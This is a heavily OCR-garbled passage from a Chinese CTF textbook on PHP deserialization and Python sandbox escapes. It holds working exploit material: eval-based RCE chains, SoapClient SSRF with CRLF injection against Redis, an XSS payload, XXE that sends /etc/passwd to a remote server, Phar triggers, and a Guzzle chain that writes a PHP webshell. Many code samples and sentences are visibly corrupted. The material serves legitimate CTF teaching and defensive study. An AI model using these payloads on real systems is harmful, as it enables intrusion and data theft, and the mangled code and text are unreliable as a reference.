序列 化 ， 主 要 是 为 了 方便 对 象 的 传输 ， 通 过 文件 、 网 络 等 方式 将 序列 化 后 的 字符 串 进行 传输 ， 最 终 通 
过 反 序 列 化 可 以 获取 之 前 的 对 象 。 


EA :£3 CE de 
化 的 身影 ， 原 因 在 于 PHP 提 供 了 丰富 的 魔术 方法 ， 加 上 自动 加 载 类 的 使 用 ， 为 构 写 EXP 提 供 了 便利 。 
作为 目前 最 流行 的 Web 知 识 点 ， 本 节 将 对 PHP 序 列 化 漏洞 逐步 介绍 ， 通 过 一 些 案例 ， 让 读者 对 PHP 反 
序列 漏洞 有 更 深 的 了 解 。 


3.1.1 PHP 反 序列 化 


本 节 介 绍 PHP 反 序列 化 的 基础 ， 以 及 常见 的 利用 技巧 。 当 然 ， 这 些 不 仅 是 CTF 比 赛 的 常备 ， 更 是 代码 
审计 中 必须 掌握 的 基础 。PHP 对 象 需要 表达 的 内 容 较 多 ， 如 类 属性 值 的 类 型 、 值 等 ， 所 以 会 存在 一 个 
基本 格式 。 下 面 则 是 PHP 序 列 化 后 的 基本 类 型 表达 : 


他 布尔 值 (bool) : b: value=>b: 0。 

学 整数 型 (int) : 1: value=>i: 1。 
人 
他 数组 型 (array) : a: <length>: {key, value pairs}; = 


他 对 象 型 (object) : O: <class name length>: 


是 一 个 对 象 ，6 表 示 对 象 名 的 长 度 ， re 3 表示 对 象 中 存在 
属性 。 个 属性 s 表 示 是 字符 串 ，4 素 示 属 性 名 的 长 度 ， 后 面 说 明 属 性 名 称 为 name， 它 的 值 为 N 
) ; 第 2 个 属性 是 age， 它 的 值 是 为 整数 型 19; 第 3 个 属性 是 sex， 它 的 值 也 是 为 空 。 


这 时 融 人 存在 一 个 问题 ， 如 何 利用 反 序 列 化 进行 攻击 呢 y” PHP 中 存在 魔术 方法 ， 即 PHP 上 自动 调用 ， 但 是 
仔 在 调用 和 条件， 比如，__destruct 是 对 象 被 销毁 的 时 候 进 行 调用 ， 通常 PHP 在 程序 块 执 行 结束 时 进行 
垃圾 回收 ， 这 将 进行 对 象 销毁 ， 然 后 自动 触发 _destruct 魔 术 方 法 ， 如 果 魔 术 方 法 还 存在 一 些 恶 意 代 
码 ， 即 可 完成 攻击 。 


常见 魔 木 方法 的 触发 方式 如 下 。 
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当 对 象 被 创建 时 : ”construct。 
当 对 象 被 销毁 时 : destruct,。 
当 对 象 被 当 作 一 个 字符 串 使 用 时 : _tostring。 


列 化 对 象 前 调用 (其 返回 需要 是 一 个 数组 ) : sleep。 


序 
反 序 列 化 恢复 对 象 前 调用 : _ wakeup。 
当 


当 调用 对 象 中 不 人 存在 的 方法 时 自动 调用 : call。 
他 从 不 可 访问 的 属性 读 取 数 据 : _get。 


下 面 对 一 些 常见 的 反 序列 化 利用 挖 据 进行 介绍 。 


3.1.1.1 常见 反 序 列 化 


PHP 代 码 如 下 : 


echo "destruct...<br>"; 
eval($_GET['cmd']); 
} 


unserialize($_GET['u']); 
?> 


这 段 代码 人 存在 一 个 test 类 中 ， 其 中 _destruct 魔 术 图 数 中 还 人 存在 eval ($ GET['cmd']) 的 代码 ， 然 后 
通过 参数 u 来 接收 序列 化 后 的 字符 串 。 所 以 ， 可 以 进行 以 下 利用 ， destruct 在 对 象 销毁 时 会 自动 调 
用 此 方法 ， 然 后 通过 cmd 参 数 传 入 PHP 代 码 ， 即 可 达到 任意 代码 执行 。 


在 利用 程序 中 ， 首 先 定义 test 类 ， 然 后 对 它 进 行 实 例 化 ， 再 进行 序列 化 输出 字符 串 ， 将 利用 代码 保存 
为 PHP 文 件 ， 浏 览 器 访问 后 即 可 显示 出 序列 化 后 的 字符 串 ， 即 D: 4:“test": 0: {}。 代 码 如 下 : 


通过 传 值 进行 任意 代码 执行 ，u 参 数 传 入 DO: 4: "test": 0: {}，cmd 参 数 传 入 system (" ， 
w 
") ， 即 最 后 代码 会 执行 System() 函 数 来 调用 whoam i 命令 。 


oam 


漏洞 利用 结果 见 图 3-1-1。 


有 时 我 们 会 遇 到 魔术 方法 中 没有 利用 代码 ， 即 不 存在 eval ($ GET[cmd']) ， 却 有 调用 其 他 类 方法 的 
代码 ， 这 时 可 以 寻找 其 他 有 相同 名 称 方法 的 类 。 例 如 ， 图 3-1-2 是 存在 漏洞 的 代码 。 


以 上 代码 便 存 在 normal 正 党 类 和 evil 恶 意 类 。 可 以 发 现 ，lemon 类 正常 调用 便 是 创建 了 一 个 normal 实 
例 ， 在 destruct 中 还 调用 了 normal 实 例 的 action 方 法 ， 如 果 将 $this->ClassObj 蔡 换 为 evil 类 ， 当 调 
用 action 方 法 时 会 调用 evil 的 action 方 法 ， 从 而 进入 eval ($this->data) 中 ， 导 致 任意 代码 执行 。 


class lemon { 
protected $ClassObj; 
function construct() { 
Sthis->Class0bj = new normal (); 
} 
function _destruct() { 
rhicae- SliaaaN hi Sarrinnll* 
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™ Wes ”we Wn "Ta 


function action() { 
echo "nello"™; 
} 


private $data; 
function action() { 
eval (Sthis->Qatal) : 
} 
} 
unserialize($ GET['d']); 


图 3-1-2 
在 Exploit 构 造 中 ， 我们 可 以 在 ”construct 中 将 Classobj 换 为 evil 类 ， 然 后 将 evil 类 的 私有 属性 data 赋 
值 为 phpinfo()。Exploit 构 造 见 图 3-1-3。 


保存 为 PHP 文 件 后 访问 ， 最 终 会 得 到 一 串 字符 : 


0:5:"lemon":1:{s:11:"*Class0bj";0:d:"evil":1:{s:10:"evildata";s:10:"phpinfo();";}} 


注意 ， 因 为 ClassObj 是 protected 属 性 ， 所 以 存在 “%00*%00” 来 表示 它 ， 而 “%00” 是 不 可 见 字 
符 ， 在 构造 Exploit 的 时 候 尽量 使 用 urlencode 后 的 字符 串 来 避免 “%00” 和 缺失 。 


protected S$ClassObj; 
function construct() { 
Sthis->ClassObj] = new evil(); 


-lclass evil { 
private S$data = "phpinfol();"; 


1 
2 
3 
4 
S 
6 
7 
8 
9 


} 
echo urlencode (serializelnew lemon())); 
echo "\n\r"; 
图 3-1-3 
最 终 使 用 Exploit 可 以 执行 phpinfo 人 代码， 结果 见 图 3-1-3。 


3.1.1.2 原生 类 利用 
实际 的 挖 洞 过 程 中 经 常 遇 到 没有 合适 的 利用 链 ， 这 需要 利用 PHP 本 身 自 带 的 原生 类 。 
LR :| [ys p> 


_Call 魔 木 方法 是 在 调用 不 存在 的 类 方法 时 候 将 会 触发 。 该 方法 有 两 个 参数 ， 第 一 个 参数 自动 接收 不 
存在 的 方法 名 ， 第 二 个 参数 接收 不 存在 方法 中 的 参数 。 例 如 ，PHP 代 码 如 下 : 


rce = unserialize($_REQUEST[ 'u']); 
rce->notexist(); 


a Se ~ 、 .人 =、 ED eA ep yp ~ > 名 路 
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PHP 存 在 内 置 类 SoapClient: : _Call， 存 在 可 以 进行 _call 魔 术 方 法 时 ， 意 味 着 可 以 进行 一 个 SSRF 
攻击 ， 具 体 利用 代码 见 Exploit。 


Exploit 生 成 (适用 于 PHP 5/7) : 


<?php 
serialize(new SoapClient(null, array('uri'=>'http://vps/', ‘location' => 'http://vps/aaa'))); 


上 面 是 new SoapClient 进 行 配置 ， 将 uri 设 置 为 自己 的 VPS 服 务 器 地 址 ， 然 后 5 将 location 设 置 为 
://vps/aaa。 以 上 生成 的 字符 串 放 入 unserialize() 函 数 ， 进 行 反 序 列 化 ， 再 进行 不 存在 方法 的 器 
用 ， 则 会 进行 SSRF 攻 击 ， 见 图 3-1-4。 





图 3-1-4 
a 但 是 只 能 做 一 次 HTTP 请 求 。 当 然 ， 可 以 使 用 CRLF (换行 注 
入 ) 进行 更 加 深入 的 利用 。 通 过 “"uri"=>'http://vps/i am here/” 注入 换行 字符 。CRLF 利 用 代码 
如 下 : 


$poc = "i am evil string..."; 
$target = "http://www.null.com:5555/"; 
$b = new SoapClient(null,array('location' => $target, 'uri'=>'hello""'.$poc.'"^hello')); 
$aaa = serialize($b); 
$aaa = str_replace('”*', "\n\r", $aaa); 
echo urlencode($aaa); 
> 


注入 结果 见 图 3-1-?5，CRLF 字 符 已 经 将 “iam evil string” 字 符 串 放 到 新 的 一 行 。 


5] = 
这 里 进而 转换 为 如 下 两 种 攻击 方式 。 


(1) 构造 post 数 据 包 来 攻击 内 网 HTTP 服 务 


这 里 存在 的 问题 是 Soap 默 认 涉 中 存在 Content-Type: text/xml， 但 可 以 通过 user_agent 注 入 数据 ， 
将 Content-Type 挤 下 ， 最 终 data=abc 后 的 数据 在 容器 处 理 下 会 忽略 后 面 的 数据 。 


构造 POST 包 结 果 见 图 3-1-6。 
(2) 构造 任意 的 HTTP 头 来 攻击 内 网 其 他 服务 (Redis ) 
例如 ， 注 入 Redis 命 令 : 


CONFIG SET dir /root/ 
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图 3-1-6 


若 Redis 未 授权 ， 则 会 执行 此 命令 。 当 然 ， 也 可 以 通过 写 crontab 文 件 进 行 有 反弹 Shell。 攻 击 redis 结 果 
册 图 3-1-7。 


图 3-1-7 
因为 Redis 对 命令 的 接收 较为 宽松 ， 即 一 行 行 对 HTTP 请 求 头 中 进行 解析 命令 ， 遇 到 图 3-1-7 中 的 “ 了 
lele]alile 
set dir/root/”， 便 会 作为 Redis 命 令 进 行 执 行 。 
2. toString 
_tostring 是 当 对 象 作 为 字符 串 处 理 时 ， 便 会 自动 触发 。PHP 代 码 如 下 : 


echo unserialize($_REQUEST['u']); 


Exploit 生 成 (适用 于 PHP 5/7) : 


<?php 
echo urlencode(serialize(new Exception("<script>alert(/hello wolrd/)</script>"))); 


主要 利用 了 Exception 类 对 错误 消息 没有 做 过 滤 ， 导 臻 最终 反 序 列 化 后 输出 内 容 在 网 页 中 造成 XSS,， 
构 写 Exploit 生 成 时 ， 将 XSS 代 码 作 为 Exception 类 的 参数 即 可 。 


通过 echo 将 Exception 反 序列 化 后 ， 便 会 进行 一 个 报错 ， 然 后 将 XSS 代 码 输 出 在 网 页 。 最 终 触 友 结 果 
见 图 3-1-8。 


图 3-1-8 


3. construct 


通常 情况 下 ， 在 反 序列 化 中 是 无 法 触发 ”_construct 魔 术 方 法 ， 但 是 经 过 开发 者 的 魔 改 后 便 可 能 存在 任 
意 类 实例 化 的 情况 。 例 如 ， 在 代码 中 加 入 call_ user func array 调 用 ， 再 禁止 调用 其 他 类 中 方法 ， 这 时 
便 可 以 对 任意 类 进行 实例 化 ， 从 而 调用 了 construct 方 法 (案例 可 参考 https://5haked.blogspot. 


p 
/2016/10/how-i-hacked-pornhub-for-fun-and-profit.html? m=1) ， 在 原生 类 中 可 以 找到 


SimpleXMLElement 的 利用 。 可 以 从 官网 中 找到 3impleXMLElement 类 的 摘 述 : 


SimpleXMLELement::__construct (string $data[, int $options =0 [, bool $data_is_url = faLse [, string 
$ns = ""[, bool $is_prefix = false ]]]]) 


通 单 进行 以 下 调用 : 


new SimpleXMLELement('https://vps/xxe_evil', LIBXML_NOENT, true); 


调用 时 注意 ，Libxml 2.9 后 默认 不 允许 解析 外 部 实体 ， 但 是 可 以 通过 函数 参数 LIBXML_NOENT 进 行 开 
局 解析 。xxe_evil 内 容 见 图 3-1-9。 


图 3-1-9 
攻击 分 为 两 个 ML 文件 ，Xxe _evil 是 加 载 远程 的 xxe_read_passwd 文 件 ，Xxe read passwd 则 通过 
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PHP 伪 协议 加 载 /etc/passwd 文 件 ， 再 对 文件 内 容 进行 Base64 编 码 ， 最 后 通过 拼接 方式 ， 放 到 HTTP 
请 求 中 市 出 来 。 


终 通过 反 序 列 化 的 利用 也 能 够 获取 /etc/passwd 的 信息 ， 结 果 见 图 3-1-10，。 


图 3-1-10 


3.1.1.3 Phar 反 序列 化 


2017 年 ，hitcon 首 次 出 现 Phar 反 序列 化 题目 。2018 年 ，blackhat 提 出 了 Phar 反 序列 化 后 被 深入 控 
掘 ，2019 年 便 可 以 看 到 花 式 Phar 题 目 。Phar 之 所 以 能 反 序 列 化 ， 是 因为 PHP 使 用 phar pL ep 
ata 
在 解析 meta 数 据 时 ， 会 调用 php_var_unserialize 进 行 反 序列 化 操作 ， 其 中 解析 代码 见 图 3- 1- i 


har parse | 
php_ unserialize data t Var hash; 


if (zip metadata len) { 
const unsigned char *p; 
unsigned char *p buff = (unsigned char *)estrndup(*buffer, zip metadata len); 
P = pbuff; 
ALLOC ZVAL(*metadata); 
INIT ZVAL(**metadata); 
PHP VAR UNSERIALIZE INIT(var hash); 


if (!php Var unserialize(metadata, &p, Pp + zip metadata len, &var hash TSRMLS CC)) { 
efree(p_buff); 
PHP VAR UNSERIALIZE DESTROY (var hash); 
zval ptr dtor(metadata); 
*metadata = NULL; 
return FAILURE; 


} 
efree(p_buff); 
PHP VAR UNSERIALIZE DESTROY(var_ hash); 
if (PHAR G(persist)) { 
/* lazy init metadata */ 
zval ptr dtor(metadata); 
ta = (zval *) pemalloc(zip metadata len, 1); 


memcpy(*metadata, *buffer, zip metadata _len); 
return SUCCESS; 


ta = NULL; 
} 


图 3-1-11 
可 以 生成 一 个 Phar 包 进行 观察 ， 需 要 注意 php.ini 中 的 phar.readonly 选 项 需要 设 为 Off。 生 成 Phar 包 
SR En 


class demot 
| public S$t = "Test"; 
function destruct()t 
echo S$this->t . "Win."™; 


Sobj = new demo; 

S$Sobj->t = 'You'; 

SP = new Phar('./demo.phar', 0); 
S$Sp->startBuffering(); 

Sp->setMetadata ($0obj); 

S$p->setStubl('GIF89a' .'<?php HALT COMPILER (); 
$Sp->addFromString('test.txt','test'); 
S$p->stopBuffering(); 


图 3-1-12 


通过 winhex 编 辑 器 对 Phar 包 进行 编辑 ， 可 以 看 到 ， 文 件 中 人 存 企 反 序列 化 后 的 字符 串 内 容 ， 见 图 3 1 3 


oo 


那么 ， 如 何 触 友 Phar 反 序列 化 ? 因为 在 PHP 中 Phar 是 属于 伪 协 议 , 伪 协议 的 使 用 最 多 的 便 是 一 些 文件 
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操作 函数 ， 如 fopen(0、copy(0、file exists()、 。 当 然 ， 继 续 深 控 ， 如 寻找 内 核 中 的 *_php 


_stream _ open wrapper ex 国 数 ，PHP 封 装 调用 此 类 函数 ， 会 让 更 多 函数 支持 封装 协议 ， 如 
el tle [AyAs 


、get meta tags、imagecreatefromgif 等 。 过 传 入 phar: pe ED 
便 可 触 友 反 序列 化 。 


例如 ， 通 过 file exists ("phar://./demo.phar") 触发 phar 反 序列 化 ， 结 果 见 图 3-1-14。 


加 EI Ee 


图 3-1-14 


3.1.1.4 小 技巧 


反 序 列 化 中 的 一 些 扩 巧 使 用 频率 较 遍 ， 但 是 目前 很 难 出 单纯 的 考点 ， 更 多 的 是 以 一 种 组 合 的 形式 加 入 
构造 利用 链 。 


”Wakeup 失 效 : CVE-2016-7124 


这 个 问题 主要 由 于 _wakeup 失 效 ， 从 而 绕 过 其 中 可 能 存在 的 限制 ， 继 而 触 友 可 能 存在 的 漏洞 ， 影 响 
版 本 为 PHP 5 至 5.6.25、PHP 7 至 7.0.10。 


原因 : 当 属 性 个 数 不 正确 时 ，process_nested data 函数 会 返回 为 0， 导 致 后 面 的 call user function 
ex 国 数 不 会 执行 ， 则 在 PHP 中 融 不 会 调用 _wakeup()。 


具体 代码 见 图 3-1-15。 


if (2 2 1) !=” PHP_IC_ENTRY 
h_exists(562_0BJCE a table, "_ wakeup", sizeof("_ wakeup"))) { 


__wakeup") -~ 1, 0); 


图 3-1-15 
可 以 使 用 图 3-1-16 的 代码 进行 本 地 测试 ， 输 入 : 


可 以 看 到 ， 图 3-1-17 触 发 了 wakeup 中 的 代码 。 


当 更 改 demo 后 的 属性 个 数 为 2 时 ( 见 图 3-1-18) : 


可 以 发 现 ，“i am wakeup” 消 失 了 ,， 证 明 wakeup 并 没有 触发 。 


class demot 
private Sa = arrayl(): 
function destructl():{ 


https://weread.qq.com/web/reader/77d32500721a485577d8eeek98f3284021498f137082c2e 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读 书 


echo "i am QQEesStIUCct .。.。 .nm: 


} 
function wakeup|()t 
Echo "i am wakeupD..."™; 


} 
unserializel($ GET['data']); 


3-1-16 
€ ”CGC QQ、 不 安全 | lemon.i/test/serialize/6.php?data=O:4:"demo":1:{s:5:"demoa";a:0:{}} 


i am wakeup...i am destruct... 


3-1-17 
€ 让 CG QQ 不 安全 | lemon.i/test/serialize/6.php?data=O:4:"demo":2:{s:5:"demoa";a:0:{}} 


i am destruct... 


图 3-1-18 


这 个 小 近 巧 最 经 典 的 真实 案例 是 yugarCRM v6.5.23 反 序列 化 漏洞 ， 它 在 wakeup 进 行 限制 ， 从 图 3-1 
-19 中 的 _wakeup 代 码 可 以 看 出 ， 它 会 对 所 有 属性 进行 清空 ， 并 且 抛 出 报错 ， 这 也 限制 了 执行 。 但 是 
通过 改变 属性 个 数 让 wakeup 和 失效 后 ， 便 可 以 利用 destruct 进 行 写 入 文件 。sugarcrm 代 码 见 图 3-1 


oo 


} 
throw new Exception ("Nor a serializable object"); 


图 3-1-19 
2. bypass 反 序列 化 正则 
当 执 行 反 序列 化 时 ， 使 用 正则 “/[oc]: \d+:i” 进 行 拦 截 ， 代 码 见 图 3-1-20， 主 要 拦截 了 这 类 反 序 


列 化 字符 : 


这 是 反 序 列 中 最 单 见 的 一 种 形式 ， 那 么 如 何 进 行 绕 过 呢 ?通过 对 PHP 的 unserialize() 国 数 进行 分 析 ， 
发 现 PHP 内 核 中 最 后 使 用 php_var_unserialize 进 行 解析 ， 代 码 见 图 3-1-21。 


function sugar unserialize (svalue) 


| 
preg match('/[oc]:\d+:/i', S$value, $matches); 


if (count ($matches)) { 


return false; 


return unserialize ($value),; 


图 3-1-20 


goto YV13: 
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YY13 : 
YYCch = wx (YYMRRKER = ++YYCURSOR); 
if (yych == ':') goto yyi17; 
goto yy3; 


YY17 : 
YYCh = x++YYCURSOR: 
if (yybm[O+yych] & 128) { 
goto YV20: 


} 
if (yych == '+') goto YY19:; 
ee 


YY19 : 
YYCh = *++YYCURSOR; 
// 判 断 字 符 是 否 为 数字 
if (yybm[O+yych] & 128) { 
Goto vy20; 
} 
goto YV18: 
图 3-1-21 


上 面 的 代码 主要 是 解析 “'O': ”语句 段 ， 跟 入 yy17 段 中 ， 还 会 存在 “+” 的 判断 。 所 以 ， 如 果 输 入 
“DO: +4: "demo": 1: {s: 5:“"demoa"; a: 0: {”， 可 以 看 到 当 “0O': ”后 面 为 “+” 时 ， 
融会 从 yy17 跳 转 到 yy19 处 理 ， 然 后 继续 对 “+” 后 面 的 数字 进行 判断 ， 意 味 着 这 是 文 持 “+” 来 表达 

数字 ， 从 而 对 上 面 的 正则 进行 绕 过 。 


3. 反 序 列 化 字符 逃逸 


这 里 的 小 技巧 是 出 目 漏 洞 案例 Joomla RCE (CVE-2015-8562) ， 这 个 漏洞 产生 的 原因 人 在 于 序 询 化 
的 字 街 串 数据 没有 做 过 滤 阔 数 正确 的 处 理 最 终 反 序列 化 。 那 么 ， 这 会 导致 什么 问题 呢 ? 我 们 知道 ， 
在 序列 化 数据 的 过 程 中 ， 如 果 序 列 化 的 是 字符 串 ， 区 会 保留 该 字符 串 的 长 度 ， 然 后 将 长 度 写 入 序列 
化 后 的 数据 ， 反 序列 化 时 融会 按照 长 度 进行 读 取 ， 并 且 PHP 质 层 实现 上 是 以 “; ”作为 分 隔 , 以 “} 
作为 结尾 。 类 中 不 仔 在 的 属性 也 会 进行 反 序列 化 ， 这 里 融会 友 生 逃逸 问题 ， 而 导致 对 象 注入 。 下 面 以 


一 个 demo 为 例 ， 代 码 见 图 3-1-22。 
<?php 
function fiLter($string){ 
$str = str_replace( search: 'x', replace: 'hi',$string); 
return $str; 
$fruits = array("apple", "orange"); 
echo(serialize($fruits) ) ; 
echo "\n"; 
$r = filter(serialize(s$fruits)); 
echo(s$r); 


echo "\n"; 
var_dump (unserializel($r)); 


图 3-1-22 
阅读 代码 ， 可 知 这 里 正确 的 结果 应 该 是 “a: 2: {i: 0; s: 5: "apple”; i: 1; s: 6: " 

"; } 。 修 改 数 组 中 的 orange 为 orangex 时 ， 结 果 会 变 成 “a: 2: {i: 0; s: 5: "apple"; i 
s: 7: “orangehi"; }”， 比 原来 序列 化 数据 的 长 度 多 了 1 个 字符 ， 但 是 实际 上 多 了 2 个 ， 这 个 肯定 会 
有 反 序 列 化 失败 。 假 设 利 用 过 滤 消 数 提供 的 一 个 字符 变 两 个 的 功能 来 逃逸 出 可 用 的 字符 串 ， 从 而 注入 想 
E33 EE 


这 里 假设 payload 为 “"; i: 1; s: 8: "scanfsec"; }”， 长 度 为 22， 需 要 填充 22 个 x， 来 逃逸 我 们 
payload 所 需 的 长 度 ， 注 入 序列 化 数据 ， 最 后 有 反 序 列 化 ， 束 能 修改 数组 中 的 属性 orange 为 scanfsec,， 
见 图 3-1-23。 


图 3-1-23 
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4. Session 反 序列 化 
PHP 默 认 存 在 一 些 Session 处 理 器 : php、php_binary、php_serialize (处 理 情况 见 图 3-1-24) 和 
(不 过 它 需要 扩展 支持 ， 较 为 少见 ， 这 里 不 做 讲解 ) 。 注 意 ， 这 些 处 理 器 都 是 有 经 过 序列 化 保存 
值 ， 调 用 的 时 候 会 反 序 列 化 。 
对 应 的 存储 格式 


php 键 名 + 竖 线 + 经 过 serialize() 函 数 反 序列 处 理 的 值 


php_binary 键 名 的 长 度 对 应 的 ASCII 字符 + 键 名 + 经 过 serialize() 函 数 反 
四 序列 处 理 的 值 


php_serialize(php>=5.5.4) ”经 过 serialize() 函 数 反 序列 处 理 的 数组 


图 3-1-24 


php 处 理 器 (PHP 默 认 处 理 ) : 
php_serialize 处 理 器 : 


当 人 存 与 读 出 现 不 一 臻 时， 处理 器 便 会 出 现 问题 。 可 以 看 到 ，php_serialize 注 入 的 stdclass 字 符 串 ， 在 
php 处 理 下 成 为 stdclass 对 象 ， 对 比 情况 见 图 3-1-25。 可 以 看 出 ， 在 php_serialize 处 理 下 存 入 “|O: 
8: "stdClass": 0: 人 ， 然 后 在 php 处 理 下 读 取 ， 这 时 会 以 “a: 2: {s: 20: ” 作为 key， 后 面 的 
“DO: 8: "stdClass": 0: {}” 则 作为 value 进 行 反 序列 化 。 


Php_serialize 情 况 下 存放 SESSION: 
32UNIG BA stdGlass sd a 


Php 情 况 下 读 取 SESSION: 
3's OtdClass: 9 和 So: 
图 3-1-25 
其 真实 案例 为 Joomla 1.5-3.4 远 程 代 码 执行 。 在 PHP 内 核 中 可 以 看 到 ，php 处 理 器 在 序列 化 的 时 候 是 
( 坚 线 ) 作为 界限 判断 ， 见 图 3-1-26。 


但 是 Joomla 是 自 写 了 Session 模 块 ， 保 存 方 式 为 “ 键 名 + 竖 线 + 经 过 serialize() 函 数 反 序列 处 理 的 
值 ”， 由 于 没有 处 理 坚 线 这 个 界限 而 导致 问题 出 现 。 


PS_SERIALIZER_ENCODE FUNC(php) /* {{{ */ 
{ 
smart_str buf = {0); 
php_serialize data t var_ hash; 
PS_ENCODE VARS; 


PHP_VAR_SERIALIZE INIT(var_hash); 


} 
smart str appendc(&buf, PS_DELIMITER); 
php_var serialize(&buf, struc, &var hash TSRMLS_CC); 


图 3-1-26 
5. PHP5 引 用 


题目 存在 just4fun 类 ， 其 中 有 enter、secret 属 性 。 由 于 $secret 是 未 知 的 ， 那 么 如 何 突破 $o-> secret 
==$o->enter 的 判断 ? 

题目 代码 见 图 3-1-27，PHP 中 存在 引用 ， 通 过 “&"” 表示 ， 其 中 “&$a"” 引用 了 “$a” 的 值 ， 即 在 内 

仓 中 是 指向 变量 的 地 址 ， 在 序列 化 字符 串 中 则 用 R 来 表示 引用 类 型 。 利 用 代码 见 图 3-1-28。 


]USt4fun 1{ 
$enter: 
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二 


SECIECL 


图 3-1-27 


图 3-1-28 
在 初始 化 时 ， 利 用 “&& ”将 ente! 指 向 secret 的 地 址 ， 最 终生 成 利用 字符 串 : 


可 以 看 到 ， 人 存 企 “s: 6: "secret"; , 
题 结 果 见 图 3-1-29。 


图 3-1-29 
6. Exception 统 过 
有 时 会 遇 上 throw 问 题 ， 因 为 报错 导致 后 面 代 码 无 法 执行 ， 代 码 见 图 3-1-30。 


B 类 中 “destruct 会 输出 全 局 的 flag 变 量 ， 反 询 化 点 则 在 throw 前 。 正 常情 况 下 ， 报 错 是 使 用 throw 
抛 出 异常 导致 destruct 不 会 执行 。 但 是 通过 改变 属性 为 “0: 1: "B": 1: {1}”， 解 析出 错 ， 由 于 
类 名 是 正确 的 ， 就 会 调用 该 类 名 的 _destruct， 从 而 在 throw 前 执行 了 _destruct。 


Em 


3.1.2 经 典 案例 分 析 


前 面 讲 述 了 PHP 反 序列 化 漏洞 中 的 各 种 技巧 ， 那 么 在 实际 做 题 过 程 中 ， 往 往 会 出 现 一 些 现实 情况 下 的 
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反 序列 化 漏洞 ， 如 Laravel 反 序列 化 、Thinkphp 反 序列 化 以 及 一 些 第 三 方 反 序 列 化 问题 ， 这 里 以 第 三 
方 库 Guzzle 为 例 。Guzzle 是 一 个 PHP 的 HTTP 客 户 端 ， 在 Github 上 也 有 不 少 的 关注 量 ， 在 6.0.0 <=6. 
3.3+ 中 存在 任意 文件 写 入 漏洞 。 至 于 Guzzle 如 何 搭建 环境 ， 这 里 不 做 袭 述 ， 读 者 可 自行 查阅 。 


下 面 对 该 漏洞 进行 讲解 ， 环 境 假 设 为 存在 任意 图 片 文件 上 传 ， 同 时 存在 一 个 参数 可 控 的 任意 文件 读 取 
(如 readfile) 。 那 么 ， 如 何 获 取 权 限 呢 ? 


首先 ， 在 guzzle/src/Cookie/FileCookieJar.php 中 存在 如 下 代码 : 


namespace GuzzleHttp\Cookie; 
class FileCookieJar extends CookieJar 


{ 
public function __destruct() 


$this->save($this->filename); 
} 


EE MA ES 


public function save($filename) 
4 
$json = []; 
foreach ($this as $cookie) { 
if (CookieJar::shouldPersist($cookie, $this->storeSessionCookies)) { 
$json[] = $cookie->toArray(); 


} 
$jsonStr = \GuzzleHttp\json_encode($json); 
if (false === file_put_contents($filename, $jsonStr)) { 
throw new \RuntimeException("Unable to save file {$filename}"); 
由 
} 


可 以 上 友 现 ， 在 第 二 个 if 济 断 的 地 方 和 存在 任意 文件 写 入 ， 文 件 名 跟 内 容 都 是 我 们 可 以 控制 的 ; 接着 看 第 
全 ieill[elw etsabIEEE 


public static function shouLdPersist(SetCookie $cookie, 
$aLLowSessionCookies = false) { 

if ($cookie->getExpires() || $allowSessionCookies) { 

if (!$cookie->getDiscard()) { 

return true; 

} 
} 
return false; 


我 们 需要 让 $cookie->getExpires() 为 true，$cookie->getDiscard() 为 false 或 null。 这 两 个 国 数 的 
定义 如 下 : 


public function getExpires() 
{ 

return $this->data['Expires']; 
public function getDiscard() 
{ 

return $this->data['Discard']; 
上 


接着 看 $json[]= $cookie->toArray/(): 


public function toArray() 
则 
return array_map(function (SetCookie $cookie) { 
return $cookie->toArray(); 
}, $this->getIterator()->getArrayCopy()); 
} 


而 SetCookie 中 的 toArray() 如 下 ， 即 返回 所 有 数据 。 


public function toArray() 
{ 


return $this->data.; 


} 


所 以 最 后 的 构造 如 下 : 


<?php 
regquire __DIR__ . '/vendor/autoload.php'"; 
use GuzzLleHttp\Cookie\FilLeCookieJar; 
use GuzzLeHttp\Cookie\SetCookie; 
$obj = new FileCookieJar('/Vvar/www/html/shell.php'); 
$payload = "<?php @eval($_POST['poc']); ?>"; 
$0obj->setCookie(new SetCookie(['Name' => 'foo', 
Walue' => "bar' ， 
'Domain' => $payload, 
'Expires' => time()])); 
tnhar = new Bharf"'nhar nhar"l: 
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ee 
$phar->startBuffering(); 

$phar->setStub("GIF89a"."<?php __HALT_COMPILERC); ?>"); 
$phar->setMetadata($obj); 
$phar->addFromstring("test .txt", "test"); 
$phar->stopBuffering(); 

rename('phar.phar','1.gif'); 


然后 将 生成 的 1.9if 传 到 题目 服务 器 上 ， 利 用 Phar 协 议 触 友 反 序列 化 即 可 。 
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3.2 Python 的 安全 问题 


因为 Python 实 现 各 种 功能 非常 简单 、 快 速 ， 所 以 应 用 越 来 越 普遍 。 同 时 由 于 Python 的 特性 问题 如 反 
序列 化 、SSTI 等 十 分 有 趣 ， 因 此 CTF 比 赛 中 也 开始 对 Python 的 特性 问题 进行 利用 的 考察 。 本 节 将 介绍 
CTF 比 赛 的 Python 题 目 中 常见 的 考点 ， 介 绍 相关 漏洞 的 绕 过 方式 ; 结合 代码 或 例题 进行 分 析 ， 让 读者 
在 遇 到 Python 代码 时 快速 找到 相关 漏洞 点 ， 并 进行 利用 。 由 于 Python 2 与 Python 3 部 分 功能 存在 差 
异 ， 实 现 可 能 有 毕 区 别 。 下 面 的 内 容 中 ， 如 果 没 有 其 他 特殊 说 明 ， 则 Python 2 和 Python 3 在 相关 漏 
洞 的 原理 上 并 没有 区 别 。 


3.2.1 阔 相 逃逸 

CTF 的 题目 中 存在 一 种 让 用 户 提交 一 段 代 码 给 服务 端 、 服 务 端 去 运行 的 题 型 ， 出 题 者 也 会 通过 各 种 方 
式 过 滤 各 种 高 风险 库 、 关 键 词 等 。 对 于 这 类 问题 ， 我 们 根据 过 滤 程度 由 低 到 高 ， 逐 一 介绍 绕 过 的 思 
路 。 


3.2.1.1 关键 词 过 滤 


关键 词 过滤 是 最 简单 的 过 滤 方 式 ， 如 过 滤 “ls” 或 “system”。 Python 是 动态 语言 ， 有 着 灵活 的 特 
性 ， 这 种 情况 非常 容易 绕 过 。 例 如 : 


>>> import 0 
>>> os.system("ls") 
>>> os.system("l" + "s") 


>>> getattr(os, "sys"+"tem")("ls") 
>>> 0s.__getattribute__("system")("ls") 


对 于 字符 串 ， 我 们 还 可 以 加 入 拼接 、 倒 序 或 者 base64 编 码 等 。 


3.2.1.2 花样 import 


在 Python 中 ， 想 使 用 指定 的 模块 最 芝 用 的 方法 是 显 式 Import， 所 以 很 多 情况 下 import 也 会 被 过 滤 。 
